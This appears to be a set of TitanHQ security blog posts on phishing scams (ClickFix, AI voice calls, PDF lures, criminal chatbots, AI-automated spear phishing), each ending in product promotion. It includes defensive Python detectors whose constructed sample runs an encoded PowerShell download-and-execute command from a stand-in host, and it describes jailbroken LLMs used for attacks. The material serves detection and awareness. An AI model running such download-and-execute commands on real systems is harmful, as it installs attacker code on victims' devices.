According to the IRS, last year taxpayers lost $5.5 billion to tax scams and fraud so vigilance is key during tax season. Be aware that cybercriminals are incredibly active during tax season, and any offer that seems too good to be true most likely is. The IRS will not initiate contact via email or text message, as initial contact is typically made via the U.S. Postal Service, and emails and text messages are only sent if the IRS has been given permission to do so. The IRS will not make contact via social media, does not accept gift cards as payment, does not use robocalls, and does not threaten to call law enforcement or immigration officials.

Businesses should ensure they have anti-spam software to catch and neutralize phishing threats; however, not all spam filtering services are equal. Spam filters perform a range of checks on inbound email, including reputation checks of the sender's domain and email address, anti-spoofing checks, checks against blacklists of malicious IP addresses, assessment of the email content for malicious links and common signatures of phishing, and anti-virus scanning of attachments. While these methods identify the vast majority of spam and many phishing attempts, on their own they are no longer sufficient.

The best spam filter for business is an advanced solution that has AI and machine learning capabilities for detecting advanced phishing scams and AI-generated threats. To catch and block AI-generated threats you need AI in your defenses. SpamTitan is an advanced cloud-based anti-spam service from TitanHQ (an anti-spam gateway is also available) that performs all of the standard checks mentioned above, scans emails with twin anti-virus engines, and uses machine-learning-based detection to identify the threats that many other spam filtering software solutions miss. If initial checks are passed, emails are sent to an email sandbox for deep analysis. With email sandboxing, attachments are assessed in a safe environment and their behavior is analyzed in depth, allowing novel malware to be identified and links are followed and assessed for malicious content.

SpamTitan consistently outperforms other leading email security solutions and, in the latest round of independent tests at VirusBulletin, SpamTitan was ranked in first place due to unbeatable detection rates, having blocked 100% of malware, 100% of phishing emails, and 99.999% of spam emails, with a 0.000% false positive rate. This tax season, ensure you have the best email protection for your business by using SpamTitan. Call TitanHQ for more information, to arrange a product demonstration, or sign up for a free trial to see for yourself how effective SpamTitan is at blocking email threats.

AI-Generated Voice Phishing Calls Combined with Email to Steal Gmail Credentials

Cybercriminals often devise phishing lures that can be used on as many individuals as possible, which is why they often impersonate big-name brands such as Microsoft, Apple, Facebook, and Google: there is a high probability that the email will land in the inbox of someone who uses those companies' products.

In the case of Google, a phishing campaign targeting Gmail account holders makes sense from the perspective of a cybercriminal as there are around 2.5 billion Gmail users worldwide. One such campaign has recently been identified that uses a combination of an email and a phone call to obtain account credentials. Email accounts can contain a wealth of sensitive information that can be misused or used in further attacks on an individual, and the accounts can be used for phishing and spear phishing campaigns.

Phishing campaigns that combine multiple communication methods are becoming more common; callback phishing is one example. The scam starts with an email devoid of malicious links, scripts, and attachments. The recipient is told that a charge will be applied to their account for a subscription or free trial that is coming to an end, and that they must call the number in the email to cancel before the charge is applied. If the number is called, the threat actor uses social engineering to trick the user into downloading a remote access tool, supposedly to remove the software and prevent the charge. That tool gives the threat actor full control of the device.

The latest campaign uses emails and phone calls in the opposite order, with initial contact made via the phone by a person impersonating the Google support team. The reason for the phone call is to advise the Gmail user that their account has been compromised or suspended due to suspicious activity, or that attempts are being made to recover access.

One user received a call in which a person claiming to be a Google customer support worker told them that a family member was trying to gain access to their account and had provided a death certificate; the call was supposedly to verify the validity of the family member's claim. People targeted in this campaign may try to verify the call by checking the phone number; however, Caller ID is spoofed so that the call appears to come from a legitimate Google customer support number.

The second phase of the scam includes an email sent to the user’s Gmail account corroborating the matter discussed in the phone call, with the email requiring action to recover the account and reset the password. A link is provided that directs the user to a spoofed login page where they are required to enter their credentials, which are captured by the scammer. There have also been reports where initial contact is made via email, with a follow-up telephone call.

Performing such a scam at scale would require a great deal of manpower, and while telephone scams are commonly conducted by call center staff in foreign countries, this scam involves AI-generated calls. The caller sounds professional and polite and has a native accent, but the victim is not conversing with a real person. The reason for the call is plausible, the voice very realistic, and the scam is capable of fooling even security-conscious individuals.

Businesses looking to improve their defenses against advanced phishing scams should ensure that they cover these types of sophisticated phishing attempts in their security awareness training programs. Employees should be told that threat actors may use a variety of methods for contact, often combining more than one communication method in the same scam. Keeping employees up to date on the latest tactics used by scammers is straightforward with the SafeTitan security awareness training platform. New training content can easily be created in response to changing tactics to keep the workforce up to date on the latest scams. SafeTitan also includes a phishing simulator for reinforcing training.

An advanced email security solution is also strongly recommended for blocking the email-based component of these sophisticated phishing scams. SpamTitan cloud-based anti-spam software incorporates machine learning capable of identifying previously unseen phishing scams, ensuring phishing attempts are blocked and do not land in inboxes. In recent independent tests at VirusBulletin, SpamTitan achieved the top spot due to comprehensive detection rates, blocking 100% of malware and phishing emails and 99.999% of spam emails. To block sophisticated AI-generated phishing attempts you need sophisticated AI-based defenses. Give the TitanHQ team a call today to find out more about improving your defenses against AI-based attacks.

Clickfix Attacks on the Rise – Are You Protected?

Cybercriminals are increasingly using a social engineering technique dubbed ClickFix to gain persistent access to victims' networks. ClickFix attacks trick the victim into installing malware themselves. They were first identified in early 2024, and use of the tactic has been increasing since. These attacks take advantage of users' desire to resolve IT issues quickly without involving their IT department, since resolving an issue normally means raising a support ticket and waiting. In a ClickFix attack, the threat actor warns the user about a fake IT issue, often providing some evidence of that issue, and offers a quick and easy solution.

The aim of these attacks is to trick the user into running a PowerShell command that ultimately delivers malware to their device. Campaigns have been conducted by threat actors distributing the Lumma information stealer, the Danabot banking trojan/information stealer, the AsyncRAT remote access trojan, and the DarkGate loader, although any malware could be delivered using this technique. Multiple threat groups have been observed using it.

The methods used to get the user to run the malicious PowerShell command are varied, with the deception occurring via email, the Internet, or a combination of the two. Threat actors have been observed conducting phishing ClickFix attacks involving emails with HTML attachments disguised as Microsoft Word documents. The attachments display a fake error message, the resolution of which requires copying and executing a malicious PowerShell command.

Malicious links have been distributed in phishing emails that direct users to sites impersonating software products such as Google Meet and PDFSimpli, the Chrome web browser, social media platforms such as Facebook, and transport and logistics companies. Threat actors also use stolen credentials to compromise websites and inject pop-ups that warn visitors about a fictitious security issue. Fake CAPTCHA prompts are common: the user is told they must verify that they are human before proceeding. As part of the "verification", the page copies a command to the clipboard and instructs the user to press Windows key + R, then Ctrl + V, then Enter, which pastes the command into the Run dialog and executes it, triggering the malware download. Security researchers have identified multiple threat actors using this technique, including Russian espionage actors in targeted attacks on Ukrainian companies and many financially motivated cybercriminal groups.
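The Win+R, Ctrl+V, Enter sequence leaves a recognisable trace on the endpoint: a script host started by the Run dialog rather than by a shortcut or another process. The Python below is an added example written for this page (not TitanHQ code) that scores constructed, Sysmon-style process-creation records for that pattern. It assumes that a command submitted through the Run dialog is spawned with explorer.exe as its parent, and that the pasted command uses PowerShell (or a similar script host) with a hidden window and/or an encoded command that downloads and runs a payload; the indicator list is illustrative, not exhaustive, and the sample command lines and domain are constructed.

```python
"""Score process-creation events for the ClickFix pattern.

Added example for this page, not TitanHQ code. Events are constructed,
Sysmon-style records. Assumption: a command pasted into the Win+R Run
dialog runs with explorer.exe as its parent process.
"""
import base64
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Checked (case-insensitively) against the raw and the decoded command line.
INDICATORS = [
    r"-w(?:indowstyle)?\s+hidden",
    r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}",
    r"\biex\b|invoke-expression",
    r"\birm\b|invoke-restmethod|invoke-webrequest|downloadstring",
    r"mshta(?:\.exe)?\s+https?://",
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or ''."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev):
    """Return the list of reasons an event looks like ClickFix (empty if none)."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    parent = ev["parent_image"].rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS:
        return []
    reasons = []
    if parent == "explorer.exe":
        reasons.append("script host launched from explorer.exe (Run dialog / Win+R)")
    text = ev["command_line"] + "\n" + decode_encoded_command(ev["command_line"])
    for pat in INDICATORS:
        if re.search(pat, text, re.I):
            reasons.append(f"command line matches {pat!r}")
    return reasons


def is_clickfix(ev, min_reasons=2):
    """Require explorer.exe parentage plus at least one command-line indicator."""
    reasons = score_event(ev)
    return len(reasons) >= min_reasons and any("explorer.exe" in r for r in reasons)


def _encode_ps(script):
    """Builds the constructed sample: PowerShell -enc expects base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Constructed ClickFix-style event: Run dialog, hidden window, encoded download-and-run.
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": f'powershell.exe -w hidden -enc {_encode_ps("iex (irm https://updates.example/fix.ps1)")}'},
    # Benign: an admin script started by cmd.exe.
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": PS,
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    # Benign: user double-clicks a .ps1 shortcut (explorer parent, nothing else).
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r"powershell.exe -File C:\Users\alice\Documents\report.ps1"},
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_clickfix(ev), score_event(ev))
```

The explorer.exe parent on its own is not enough (double-clicking a script produces the same parent), which is why the rule requires a second indicator; decoding the encoded command before matching matters because the download-and-execute verbs are otherwise invisible in the raw command line.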

To defend against ClickFix attacks, businesses need to implement multiple mitigations, the most important of which are security awareness training, an advanced spam filter, and a web filtering solution. Regular security awareness training should be conducted to improve understanding of the phishing and social engineering techniques used by threat actors, including specific content that teaches employees how to identify and avoid ClickFix attacks. TitanHQ offers a comprehensive training platform called SafeTitan that allows businesses to easily create security awareness training programs tailored to individuals and user groups, and rapidly roll out additional training material when a new threat is identified. SafeTitan also includes a phishing simulator to test employee responses to simulated ClickFix attacks.

An advanced spam filter is essential for blocking malicious emails. TitanHQ's SpamTitan suite includes a spam filter for Office 365, a gateway spam filter, and the most popular choice, a cloud-based anti-spam service. SpamTitan conducts an extensive array of tests to identify spam and malicious emails, including reputation checks, checks of embedded hyperlinks, email sandbox behavioral analysis, and AI/machine learning to identify threats that bypass many email security solutions. In recent tests, SpamTitan outperformed all other tested email security solutions with a 100% malware and phishing catch rate and a 99.999% spam catch rate.

Web filtering solutions should be used to protect against the web-based component of ClickFix attacks, since initial contact is not always made via email. The WebTitan DNS filter prevents access to known malicious websites, such as the attacker-controlled pages used in ClickFix attacks. WebTitan can also block downloads of specified file extensions from the Internet and control the categories of websites that employees can visit.

With regular security awareness training, email security, and web security delivered through SafeTitan, SpamTitan, and WebTitan, businesses will be well protected from ClickFix attacks. Call TitanHQ today to find out more or take advantage of a free trial of these solutions.

New Malware and Phishing-Focused AI Chatbot Highlights Need for AI-Aided Defenses

A new AI chatbot has been released specifically for cybercriminals, developed to assist with malware development, phishing campaigns, and business email compromise attacks. The chatbot, called GhostGPT, follows WormGPT, WolfGPT, and EscapeGPT, which are also aimed at cybercriminals and lack the restrictions of ChatGPT and other publicly available chatbots, which refuse queries related to criminal activity. GhostGPT is thought to connect to a jailbroken open-source large language model (LLM) so that queries are not subject to content restrictions. The tool is offered on Telegram and can be used immediately after paying a fee.

There is growing evidence that cybercriminals are using AI tools for malware development, phishing/spear phishing, and business email compromise (BEC), and there is considerable interest in these tools in the cybercriminal community. These tools can open up new types of attacks to low-skilled cybercriminals, as well as help skilled cybercriminals conduct attacks at an accelerated rate and bypass security solutions. They can be used to write malware code with extensive capabilities, dramatically reducing the time required for malware development. Phishing emails can be crafted in multiple languages with perfect grammar and spelling. AI tools are being used to slash the time taken to research individuals for spear phishing and BEC attacks and can even generate emails likely to be of interest to recipients. A recent study demonstrated that humans are not good at identifying AI-generated phishing emails; the researchers found their AI-generated emails achieved a 54% click rate.

These tools allow rapid development of malware from scratch and cybercriminals can easily spin up multiple malware versions capable of defeating signature-based detection. Phishing and BEC emails can easily fool targeted individuals as they lack the common signs of malicious emails that employees are taught to look for and the level of personalization of emails can be increased with little effort, making it easy for cybercriminals to scale up their spear phishing and BEC campaigns.

Malicious use of LLMs is a genuine cause for concern. Businesses need to respond to these fast-evolving threats by improving their cybersecurity defenses. Since these attacks are predominantly conducted via email, robust email defenses are a must. To defeat AI-generated phishing emails, businesses need to ensure they incorporate AI in their defenses and email security solutions need more than signature-based detection to identify and block malware.

SpamTitan, TitanHQ's spam filtering service, incorporates AI and machine learning algorithms to identify the malicious AI-generated emails that many spam filtering solutions fail to block. SpamTitan also includes a next-generation email sandbox, where emails are sent for extensive analysis to identify threats by their behavior rather than their signature. In the Q4 2024 VirusBulletin tests, the engine that powers SpamTitan and TitanHQ's Microsoft 365 anti-phishing solution, PhishTitan, ranked first for overall score, outperforming all other leading email filtering solutions under test. TitanHQ achieved a 100% malware catch rate, 100% phishing catch rate, and 99.999% spam catch rate, with a 0.000% false positive rate.

The high percentage of individuals fooled by AI-generated phishing emails highlights the importance of regular security awareness training. Employees must be kept aware of the latest threats and tactics used by cybercriminals, and training should be reinforced with phishing simulations. Phishing simulations have been proven to make training more effective and to highlight the individuals who are failing to apply their training to the emails they receive every day. The SafeTitan security awareness training platform and phishing simulator make it easy to spin up training courses, keep employees up to date on the current threat landscape, and automate phishing simulations.

Speak with the TitanHQ team today to discuss your options for improving your defenses against phishing and malware. TitanHQ's solutions are available on a free trial and product demonstrations can be arranged on request.

New Phishing Campaigns Impersonate Amazon Prime and the US Postal Service

New phishing schemes are constantly developed by threat actors to trick people into disclosing sensitive information or downloading malicious files that provide the attacker with remote access to their devices. This month, two campaigns have been identified that use PDF files to hide the phishing content from email security solutions, one of which uses a lure of expired Amazon Prime memberships, and the other impersonates the US Postal Service and advises the recipient about a failed delivery.

Amazon Prime Phishing Campaign

The emails in this phishing campaign appear to have been sent by Amazon Prime and include a PDF file attachment. The PDF file advises the recipient that their membership is due to expire on a specified date; however, the card Amazon has on file is no longer valid. In order to continue with the membership, new card details must be supplied; however, attempts will first be made to charge the membership to all other cards on the account. Users are warned that if payment is not made, the account will be suspended.

Due to the huge number of Amazon Prime members, the emails have a good chance of landing in the inbox of an Amazon Prime subscriber; however, anyone who has previously had an Amazon Prime membership may be tricked into following the link in the PDF to ensure that the cards on file will not be charged.

If the link is clicked, the user is directed to a URL (a duckdns.org subdomain) that displays an exact copy of the Amazon sign-in page. If they attempt to log in, they are asked to secure their account by confirming their identity and are told to sign out of all web apps, devices, and web browsers. The “Verify Your Identity” page asks for their full name, date of birth, Social Security number, phone number, and full address. They are then taken to a page where they are asked to enter their payment card information. In addition to fraudulent charges to their card, the theft of personal information puts victims at risk of identity theft.

US Postal Service Phishing Campaign

A large-scale phishing campaign is being conducted impersonating the US Postal Service that similarly uses malicious PDFs. This campaign specifically targets mobile devices with the aim of harvesting personal information. More than 630 phishing pages have been identified as part of this campaign targeting individuals in more than 50 countries. The PDF files use a novel technique for hiding the phishing URL from email security solutions, making it harder to identify and extract the URL for analysis.

Text messages are sent that advise the recipient that a package has arrived at a USPS distribution center; however, the package cannot be delivered due to incomplete address information. A link is included to a web-hosted PDF file that the recipient is told they must click to complete the address information. The link directs the user to a phishing page, where they must enter their full address, email address, and contact telephone number into the form. They are then asked to pay a small service charge for redelivery – $0.30 – and must submit their card details.

Improve Your Phishing Defenses

These are just two examples of new phishing campaigns that use PDF files to hide phishing links from email security solutions. PDF files are commonly used for this purpose as they can contain clickable links, scripts, and even malicious payloads. What makes the attacks even more effective is when they target mobile devices, which have smaller screens that make it harder to view the URL, thus making it easier to hide a domain unrelated to the company being impersonated. Mobile devices also tend to have weaker security than desktop computers and laptops.
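As an added illustration (not code from this page or from TitanHQ), here is a small Python check a mail gateway or analyst could run on a PDF attachment: it pulls every /URI target out of the file, including targets written as hex strings or sitting inside a Flate-compressed stream, which a plain text scan of the attachment would miss, and flags any whose host is not the impersonated brand's own domain. The sample PDF, the brand domain amazon.example and the duckdns.org hostname are constructed values.

```python
import re
import zlib
from urllib.parse import urlparse

# Constructed sample PDF, not a file from either campaign. It carries three link
# targets: a literal-string /URI, a hex-string /URI, and a /URI inside a
# FlateDecode-compressed stream.
def build_sample_pdf() -> bytes:
    hex_uri = b"https://sample.duckdns.org/verify".hex().encode()
    hidden = zlib.compress(b"<< /S /URI /URI (https://compressed.example/hidden) >>")
    return (
        b"%PDF-1.4\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
        b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R 5 0 R] >> endobj\n"
        b"4 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 100 20]\n"
        b"   /A << /S /URI /URI (https://amazon.example/renew) >> >> endobj\n"
        b"5 0 obj << /Type /Annot /Subtype /Link /Rect [0 30 100 50]\n"
        b"   /A << /S /URI /URI <" + hex_uri + b"> >> >> endobj\n"
        b"6 0 obj << /Length " + str(len(hidden)).encode() + b" /Filter /FlateDecode >>\n"
        b"stream\n" + hidden + b"\nendstream\nendobj\n"
        b"trailer << /Root 1 0 R >>\n%%EOF\n"
    )

LITERAL_URI = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)", re.DOTALL)
HEX_URI = re.compile(rb"/URI\s*<([0-9A-Fa-f\s]*)>")
STREAM = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)

def _unescape(s: bytes) -> bytes:
    """Resolve the PDF literal-string escapes that matter for URLs: \\( \\) \\\\ and \\ddd."""
    def sub(m):
        esc = m.group(1)
        if esc[:1].isdigit():
            return bytes([int(esc, 8) & 0xFF])
        return {b"n": b"\n", b"r": b"\r", b"t": b"\t"}.get(esc, esc)
    return re.sub(rb"\\([0-7]{1,3}|.)", sub, s, flags=re.DOTALL)

def extract_pdf_uris(pdf: bytes) -> list[str]:
    """Return every /URI target found in raw objects and in inflatable streams."""
    regions = [pdf]
    for m in STREAM.finditer(pdf):
        try:
            # decompressobj tolerates the trailing newline before 'endstream'
            regions.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass  # not Flate data (images, other filters, encrypted content)
    found = set()
    for region in regions:
        for m in LITERAL_URI.finditer(region):
            found.add(_unescape(m.group(1)).decode("latin-1"))
        for m in HEX_URI.finditer(region):
            digits = re.sub(rb"\s+", b"", m.group(1))
            if len(digits) % 2:
                digits += b"0"  # PDF hex strings may omit the final digit
            found.add(bytes.fromhex(digits.decode()).decode("latin-1"))
    return sorted(found)

def flag_offbrand_links(pdf: bytes, brand_domains: set[str]) -> list[tuple[str, str]]:
    """Pair each link with 'ok' if its host is the impersonated brand's domain
    (or a subdomain of it) and 'suspicious' otherwise."""
    verdicts = []
    for url in extract_pdf_uris(pdf):
        host = (urlparse(url).hostname or "").lower()
        on_brand = any(host == d or host.endswith("." + d) for d in brand_domains)
        verdicts.append((url, "ok" if on_brand else "suspicious"))
    return verdicts

if __name__ == "__main__":
    for url, verdict in flag_offbrand_links(build_sample_pdf(), {"amazon.example"}):
        print(f"{verdict:10} {url}")
```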

Businesses should ensure they conduct regular security awareness training to teach cybersecurity best practices, warn employees about cyber threats, and teach the skills needed to identify phishing and social engineering attempts. Training should be an ongoing process and should include the latest scams and new techniques used by cybercriminals to target employees, especially campaigns targeting mobile devices as malicious text messages are harder to block than malicious emails. An advanced email security solution should be implemented that has AI and machine learning capabilities, and email sandboxing to analyze emails and attachments in-depth to identify malware, malicious scripts, and embedded hyperlinks.

TitanHQ can help in both of these areas. SafeTitan is a comprehensive security awareness training platform that makes it easy to create and automate security awareness training for the workforce. The platform includes a phishing simulator for conducting internal phishing campaigns to reinforce training and identify individuals who are susceptible to phishing attempts.

TitanHQ’s cloud-based anti-spam service, SpamTitan, is an advanced email security solution for blocking the full range of email threats including phishing, spear phishing, business email compromise, and malware. In independent tests, SpamTitan achieved first place for detection, blocking 100% of phishing attempts, 100% of malware, and 99.999% of spam emails, with a 0.000% false positive rate.

For more information on cloud-based email filtering and attachment and message sandboxing with SpamTitan and security awareness training and phishing simulations with SafeTitan, give the TitanHQ team a call. All TitanHQ solutions are available on a free trial, and MSP-focused solutions are available to easily add advanced anti-phishing and security awareness training to service stacks.

AI-Generated Phishing Emails Trick More Than 50% of Recipients

Large language models (LLMs) are used for natural language processing tasks and can generate human-like responses after being trained on vast amounts of data. The most capable LLMs are generative pretrained transformers, or GPTs, the most popular of which is ChatGPT, although there are many others including the China-developed DeepSeek app.

These AI-powered tools have proven incredibly popular and are used for a wide range of tasks, eliminating a great deal of human effort. They are used for creating articles, resumes, and job applications, completing homework, translating from one language to another, summarizing text to pull out the key points, and writing and debugging code, to name just a few applications.

When these artificial intelligence tools were released for public use, security professionals warned that in addition to the beneficial uses, they could easily be adopted by cybercriminals for malicious purposes such as writing malware code, phishing/spearphishing, and social engineering.

Guardrails were implemented by the developers of these tools to prevent them from being used for malicious purposes, but those controls can be circumvented. Further, LLMs have been made available specifically for use by cybercriminals that lack the restrictions of tools such as ChatGPT and DeepSeek.

Evidence has been growing that cybercriminals are actively using LLMs for malicious purposes, including writing flawless phishing emails in multiple languages. Human-written phishing emails often contain spelling mistakes and grammatical errors, making them relatively easy for people to identify, but AI-generated phishing emails lack these easily identified red flags.

While cybersecurity professionals have predicted that AI-generated phishing emails could potentially be far more effective than human-generated emails, it is unclear how effective these AI-generated messages are at achieving the intended purpose – tricking the recipient into disclosing sensitive data such as login credentials, opening a malicious file, or taking some other action that satisfies the attacker’s nefarious aims.

A recently conducted study set out to explore how effective AI-generated spear phishing emails are at tricking humans compared to human-generated phishing attempts. The study confirmed that AI tools have made life much easier for cybercriminals by saving them a huge amount of time. Worryingly, these tools significantly improve click rates.

For the study, researchers from Harvard Kennedy School and Avant Research Group developed an AI-powered tool capable of automating spear phishing campaigns. Their AI agents were based on GPT-4o and Claude 3.5 Sonnet, which were used to crawl the web to identify information on individuals who could be targeted and to generate personalized phishing messages.

The bad news is that they achieved an astonishing 54% click-through rate (CTR) compared to a CTR of 12% for standard phishing emails. In a comparison with phishing emails generated by human phishing experts, a similar CTR was achieved with the human-generated phishing emails; however, the human version cost 30% more than the cost of the AI automation tools.

What made the phishing emails so effective was the level of personalization. Spear phishing is a far more effective strategy than standard phishing, but these attacks take a lot of time and effort. By using AI, the time taken to obtain the personal information needed for the phishing attempt and develop a lure relevant to the targeted individual was massively reduced. In the researchers’ campaign, the web was scraped for personal information and the targeted individuals were invited to participate in a project that aligned with their interests. They were then provided with a link to click for further information. In a genuine malicious campaign, the linked site would be used to deliver malware or capture credentials.

AI-generated phishing is a major cause of concern, but there is good news. AI tools can be used for malicious purposes, but they can also be used for defensive purposes and can identify the phishing content that humans struggle to identify. Security professionals should be concerned about AI-generated phishing, but email security solutions such as SpamTitan can give them peace of mind.

SpamTitan, TitanHQ’s cloud-based anti-spam service, has AI and machine learning capabilities that can identify human-generated and AI-generated phishing attempts, and email sandboxing for detecting zero-day malware threats. In recent independent tests, SpamTitan outperformed all other email security solutions and achieved a phishing and malware catch rate of 100% and a spam catch rate of 99.999%, with a 0.000% false positive rate. When combined with TitanHQ’s security awareness training platform and phishing simulator, SafeTitan, security teams will be able to sleep easily.

For more information about SpamTitan, SafeTitan, and other TitanHQ cybersecurity solutions for businesses and managed service providers, give the TitanHQ team a call. All TitanHQ solutions are available on a free trial and product demonstrations can be arranged on request.

That Recruitment Email Could be A Phishing Attempt

A scam has recently been identified that impersonates the CrowdStrike recruitment process and tricks recipients into downloading the XMRig cryptocurrency miner. Initial contact is made via email, with the email using CrowdStrike branding and offering an interview with the company.

The emails claim that the next phase of the hiring process is a 15-minute call with the hiring team; however, this year, the company is rolling out a new applicant and employee CRM app. The recipient is instructed to click the employee CRM application button, which triggers the download of a fake application for scheduling the interview. Recipients are given the option of downloading a Windows or macOS version of the application; however, the downloaded file is an XMRig installer. When executed, the installer checks whether a debugger is attached to the process, checks that the device has two cores and is suitable for cryptocurrency mining, and checks for virtualization and for running processes that indicate a sandbox environment. If the checks are passed, a copy of XMRig is downloaded from GitHub and executed, and the user is presented with an error message advising them that the installation has failed, potentially due to a hardware compatibility issue. The user is told to try again by downloading the application on another device, potentially infecting a second device with XMRig.

Jobseekers are often targeted in phishing scams. In the hunt for a job, they can be susceptible to phishing attempts, forgetting their security awareness training in the hope of landing an exciting new position. Fraudsters often claim to be recruitment agents who have identified individuals for a lucrative job and may even claim that the job is theirs based on information found on professional networking sites or from headhunting activities. According to the Better Business Bureau, recruitment scams result in losses of around $2 billion each year, and these scams are becoming more common.

The scammers often seek personal information and usually require the payment of a nominal charge for job placement or training, or in this case, the goal is malware delivery. Initial contact may be made via email to a personal email address; however, this could easily result in malware being installed on a corporate-owned device. As with all phishing attempts, vigilance is key. Regardless of the subject of an email or the offer or threat contained therein, all emails should be subject to checks to assess the authenticity of the email.

For businesses, TitanHQ offers a comprehensive security awareness training platform for training workforce members on cybersecurity best practices and common threats. The platform includes hundreds of computer-based training modules covering all aspects of security. The training modules are no longer than 10 minutes, are enjoyable and engaging, and can be easily combined into training courses tailored for job roles or individuals. New content is frequently added in response to changing tactics, techniques, and procedures of threat actors to keep employees up to date on the threats they are likely to encounter.

The platform also includes a phishing simulator for assessing the effectiveness of training and identifying individuals who are susceptible to phishing attempts to ensure they receive the additional training they need. Through regular security awareness training and phishing simulations using the SafeTitan platform, businesses have been able to make measurable improvements to their human defenses, reducing susceptibility to phishing attempts by up to 80%. If you have yet to implement a security awareness training program or your employees are still falling for phishing attempts, give the TitanHQ team a call about the SafeTitan platform.

Is Better Phishing Protection One of Your New Year Resolutions?

Various analyses indicate there has been a significant increase in phishing attacks in 2024, with one study revealing that 94% of organizations experienced at least one phishing attack in 2024, two percentage points higher than the previous year. The majority of those organizations suffered bad consequences as a result of those attacks.

Phishing attacks are not only increasing in volume, they are also increasing in sophistication and AI tools are making phishing attempts much harder to identify. AI tools are being used to slash the amount of time taken to conduct research for spear phishing attacks, including using these tools to create lures that the targeted individuals are likely to respond to. AI tools are being used to create grammatically perfect emails, even matching the writing style of the impersonated company or individual. There has also been an increase in multi-channel attacks, where phishers combine email, text messages, and the telephone in their scams.

In the United States, the Federal Bureau of Investigation’s Internet Crime Complaint Center publishes an annual report on cybercrime complaints, with this year’s report showing almost 300,000 reports of phishing-related cybercrime, not including cyberattacks such as ransomware attacks that started with phishing emails. Across the Atlantic, in the UK, it was a similar story, with the Information Commissioner’s Office also reporting an increase in complaints related to phishing.

With the increase in attacks, use of AI tools, and rising data breach costs, it is no surprise that phishing is one of the biggest causes of stress for cybersecurity professionals. With the New Year rapidly approaching, now is the perfect time to ease the stress by enhancing your defenses and strengthening your email security posture, and one of the best ways to do that is with an improved email security solution capable of identifying and blocking even sophisticated threats.

At TitanHQ, we are continuously making improvements to the engine at the heart of our antispam software (SpamTitan) and anti-phishing solution (PhishTitan) to improve detection and usability. The latest release is the most powerful yet, with AI and machine learning capabilities and email sandboxing for exceptional malware detection. The engine has been shown to be highly effective in independent tests by VirusBulletin, a highly respected independent computer security company.

VirusBulletin put the engine that powers the SpamTitan and PhishTitan solutions to the test along with 10 leading email security solutions and awarded it joint first place for overall score in the Q3 2024 tests, and first place in the Q4 2024 tests. For the third consecutive quarter, TitanHQ achieved a 100% malware catch rate, and the phishing catch rate increased from 99.99% in Q2 to 100% in Q4, with a Q4 spam catch rate of 99.99% and a 0.00% false positive rate. The strong performance has earned TitanHQ its third consecutive VBSpam+ award. SpamTitan and PhishTitan are very competitively priced, and it is easy to switch from alternative email security solutions. Given the amazing catch rates, ease of use, and competitive pricing, it should come as no surprise that record numbers of companies are making the switch to TitanHQ to improve their phishing defenses.

Technical defenses are important for blocking threats, but it is also important that your workforce is trained to recognize phishing and other security threats. The workforce needs to be provided with regular training sessions to reinforce security best practices and make them aware of the threats they are likely to encounter. Through regular training, you can develop a security culture and ensure that employees will be able to detect, avoid, and report any threats landing in their inboxes.

The easiest way to improve security awareness is with a comprehensive training platform such as SafeTitan. SafeTitan is an easy-to-use training platform with hundreds of training modules covering all aspects of security that is used by businesses to teach security best practices and raise awareness of common and not-so-common threats. Training courses can easily be created for different users, job roles, and threat levels, and the training can be automated to provide hands-off training continuously throughout the year. The platform can be configured to automate the delivery of relevant training in response to security errors, and the phishing simulator can be used to conduct internal campaigns to reinforce training and identify areas where training needs to be improved.

Why not get 2025 off to the perfect start by improving your phishing defenses with TitanHQ? Give the team a call today to discuss these solutions in more detail and take advantage of a free trial of these solutions to see for yourself the difference they make to your phishing defenses.

AI Tools Used to Research Executives in Targeted Phishing Campaigns

It used to be relatively easy to spot a phishing attempt. Phishing emails would have poor grammar and be littered with spelling mistakes, with relatively easy-to-identify lures such as too-good-to-be-true offers. The unsolicited emails would be sent from unknown email addresses in huge volumes, as threat actors knew they were good enough to fool enough recipients and make the campaigns worthwhile. Provided employees had a modicum of security awareness training and took time to carefully read emails, the phishing attempts could be easily identified and avoided.

Phishing has been growing in sophistication and while these poorly constructed emails are not exactly a thing of the past, there is now a new breed of phishing emails that are expertly written, contain no errors, and are highly personalized to maximize the probability of getting the desired response. In order to conduct a highly personalized spear phishing campaign, threat actors need to spend a considerable amount of time researching their intended targets. In order to warrant that amount of time, the potential rewards must be high. These campaigns are usually conducted on high-value targets such as C-suite members by well-resourced threat actors, such as state-sponsored hacking groups.

Advances in AI technology have made these highly targeted phishing campaigns much easier to conduct. AI tools greatly reduce the amount of human effort required and that has opened up these targeted campaigns to a much broader range of cybercriminals. AI tools can be used to craft perfect phishing emails that closely mimic the companies and brands they spoof, making identification difficult. AI tools are also being used to analyze online profiles to gather personal information to be included in phishing emails, massively reducing the time required to construct the perfect scam email.

